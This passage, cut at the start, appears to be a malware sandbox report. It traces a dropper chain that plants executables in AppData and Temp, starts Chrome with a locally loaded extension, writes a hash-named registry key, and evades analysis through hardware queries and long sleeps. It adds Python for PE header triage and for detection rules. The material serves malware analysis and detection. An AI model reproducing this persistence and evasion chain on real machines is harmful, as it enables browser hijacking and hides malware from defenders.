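        "timestamp_utc": datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%a %b %d %H:%M:%S %Y UTC"),
        "timestamp_in_future": ts > now_ts,
        "image_base": image_base,
        "image_base_high": image_base > 0x60000000,
        "dll_characteristics": [n for bit, n in DLL_CHARACTERISTICS.items() if dllchars & bit],
        "has_clr_header": dir_present(DIR_COM_DESCRIPTOR),   # managed (.NET) image
        "has_debug_dir": dir_present(DIR_DEBUG),             # where the .pdb path is recorded
        "sections": sections,
        "packed_sections": [s["name"] for s in sections if s["entropy"] > PACKED_ENTROPY],
    }


def build_sample_pe() -> bytes:
    """Constructed PE32+ image (not the real sample) carrying the report's header facts."""
    text = bytes(range(256)) * 8      # uniform bytes: max-entropy stand-in for an encrypted .text
    rsrc = b"\0" * 512                # low-entropy filler section
    hdr_len = 0x200                   # one file-alignment unit holds all headers
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)                    # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 2, 0x89B686F2, 0, 0, 240, 0x0022)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                                    # PE32+ magic
    struct.pack_into("<Q", opt, 24, 0x140000000)                             # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)                          # section/file alignment
    struct.pack_into("<H", opt, 70, 0x0020 | 0x0040 | 0x0100 | 0x0400 | 0x8000)
    struct.pack_into("<I", opt, 108, 16)                                     # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 112 + 8 * DIR_DEBUG, 0x3000, 0x1C)
    struct.pack_into("<II", opt, 112 + 8 * DIR_COM_DESCRIPTOR, 0x2000, 0x48)

    def section(name, va, raw_ptr, data, flags):
        return struct.pack("<8sIIIIIIHHI", name, len(data), va, len(data), raw_ptr, 0, 0, 0, 0, flags)

    headers = (dos + coff + bytes(opt)
               + section(b".text", 0x1000, hdr_len, text, 0x60000020)
               + section(b".rsrc", 0x2000, hdr_len + len(text), rsrc, 0x40000040))
    return headers.ljust(hdr_len, b"\0") + text + rsrc


if __name__ == "__main__":
    for key, value in triage_pe(build_sample_pe()).items():
        print(f"{key:22} {value}")
```

Run on the constructed image it reports the same findings the sandbox lists for the real file: a 2043 timestamp, image base above 0x60000000, all five DllCharacteristics flags, CLR and DEBUG directories present, and .text flagged as packed. Point triage_pe() at the real sample's bytes (open(path, "rb").read()) to compare.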

Persistence and Installation Behavior

Source: Yara match File source: 00000000.00000002.1665987392.000001DFA7B16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: zlONcFaXkc.exe PID: 7316, type: MEMORYSTR
Source: C:\Users\user\Desktop\zlONcFaXkc.exe File created: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe File created: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension" Jump to behavior

Boot Survival

Source: Yara match File source: 00000000.00000002.1665987392.000001DFA7B16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: zlONcFaXkc.exe PID: 7316, type: MEMORYSTR
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\cd738f7ec36d311b107bd6ec4b05793a 9F06F2D0565EA31B8A486D63B122AF45 Jump to behavior
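The persistence chain recorded in the two sections above is: zlONcFaXkc.exe drops %APPDATA%\IsFixedSize\Target.exe, Target.exe drops %TEMP%\zcezeaqsuhi.exe, that process starts chrome.exe with --load-extension pointing at an unpacked extension under %TEMP%, and Target.exe writes an MD5-shaped key directly under HKCU\SOFTWARE. The MicrosoftEdgeAutoLaunch_... Run value is written by msedge.exe itself (see its Source column) and is Edge's own startup-boost entry, so it belongs to the baseline rather than to the sample's persistence. The Python below is an added example, not sandbox output: it turns those observations into three detection rules and runs them over constructed Sysmon-style events built from the report's paths. Field names (Image, ParentImage, CommandLine, TargetObject, Details) follow Sysmon; the event values themselves are made up for the example.

```python
"""Detection rules for the persistence chain in the report, run over constructed
Sysmon-style events. Added example; the events are modelled on the report's
paths and are not the sandbox's own telemetry."""
import re
from dataclasses import dataclass

BROWSERS = ("chrome.exe", "msedge.exe", "brave.exe")
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\")
HEX32 = re.compile(r"^[0-9a-f]{32}$", re.I)                 # MD5-shaped names such as cd738f7e...
LOAD_EXT = re.compile(r'--load-extension=("?)([^"\s]+)\1', re.I)


@dataclass
class Finding:
    rule: str
    severity: str
    evidence: str


def in_user_writable(path: str) -> bool:
    return any(p in path.lower() for p in USER_WRITABLE)


def check_process(ev: dict) -> list:
    """Browser started with an unpacked extension, or started by a binary in a user-writable dir."""
    out = []
    if not ev["Image"].lower().endswith(BROWSERS):
        return out
    m = LOAD_EXT.search(ev.get("CommandLine", ""))
    if m:
        sev = "high" if in_user_writable(m.group(2)) else "medium"
        out.append(Finding("browser_load_extension", sev, f"{ev['Image']} -> {m.group(2)}"))
    parent = ev.get("ParentImage", "")
    if in_user_writable(parent):
        out.append(Finding("browser_spawned_from_user_dir", "medium", f"parent={parent}"))
    return out


def check_registry(ev: dict) -> list:
    """Hash-named key directly under HKCU\\SOFTWARE, or a Run value pointing at a user-writable path."""
    out = []
    target = ev["TargetObject"]
    parts = target.split("\\")
    if (len(parts) >= 3 and parts[0].upper() in ("HKCU", "HKEY_CURRENT_USER")
            and parts[1].upper() == "SOFTWARE" and HEX32.match(parts[2])):
        out.append(Finding("hkcu_software_hash_named_key", "medium", target))
    if "\\currentversion\\run\\" in target.lower() and in_user_writable(ev.get("Details", "")):
        out.append(Finding("run_value_user_writable_target", "high", f"{target} = {ev['Details']}"))
    return out


def scan(events: list) -> list:
    out = []
    for ev in events:
        if ev["EventType"] == "ProcessCreate":
            out.extend(check_process(ev))
        elif ev["EventType"] == "RegistryValueSet":
            out.extend(check_registry(ev))
    return out


# Constructed events modelled on the report (not real telemetry).
SAMPLE_EVENTS = [
    {"EventType": "ProcessCreate",
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension="C:\Users\user\AppData\Local\Temp\Extension"'},
    {"EventType": "RegistryValueSet",            # Edge's own startup-boost value: baseline, must stay silent
     "Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868",
     "Details": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window'},
    {"EventType": "RegistryValueSet",
     "Image": r"C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\cd738f7ec36d311b107bd6ec4b05793a\9F06F2D0565EA31B8A486D63B122AF45",
     "Details": "<binary>"},                     # value data not shown in the report; placeholder
    {"EventType": "ProcessCreate",               # ordinary user launch: must stay silent
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" https://example.com'},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity}] {f.rule}: {f.evidence}")
```

The two benign events are deliberate: a Run value whose target is under Program Files and a chrome.exe started by explorer.exe produce nothing, while the dropper's chrome.exe launch yields both a high-severity load-extension finding and a parent-path finding, and Target.exe's registry write yields the hash-named-key finding. In production the same rules map onto Sysmon Event IDs 1 and 13 or the equivalent EDR process and registry telemetry.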
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Process information set: NOOPENFILEERRORBOX (64 occurrences)
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Process information set: NOOPENFILEERRORBOX (49 occurrences)
Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX (16 occurrences)
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (10 occurrences)
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX (55 occurrences)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\zlONcFaXkc.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive (2 occurrences)
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive (2 occurrences)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Memory allocated: 1DFA7BE0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Memory allocated: 1DFC1510000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Memory allocated: 1D099EE0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Memory allocated: 1D0B36C0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Memory allocated: 2A5B9950000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe Memory allocated: 2A5D3550000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Code function: 1_2_00007FFD9B8B31D4 sldt word ptr [eax] 1_2_00007FFD9B8B31D4
Source: C:\Users\user\Desktop\zlONcFaXkc.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 1199955
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 1199828
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 1199718
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 1198910
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 599886
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 599777
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 598871
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 598761
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 598652
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 597708
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Thread delayed: delay time: 597543
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Window / User API: threadDelayed 3692
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe Window / User API: threadDelayed 6002
Source: C:\Users\user\Desktop\zlONcFaXkc.exe TID: 7336 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59871s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59765s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59656s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59547s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59437s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59328s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59218s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59109s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -58999s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7388 Thread sleep time: -540000s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -1199955s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -1199828s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -1199718s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59875s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59766s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59641s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59531s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59422s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59313s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -1198910s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -599886s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -599777s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59867s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -119500s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59640s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59529s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59407s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59287s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -598871s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -598761s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -598652s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59840s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59733s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59625s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59516s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59379s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59261s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -597708s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -597543s >= -30000s
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe TID: 7432 Thread sleep time: -59859s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7920 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Users\user\Desktop\zlONcFaXkc.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\zlONcFaXkc.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor (16 occurrences)
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
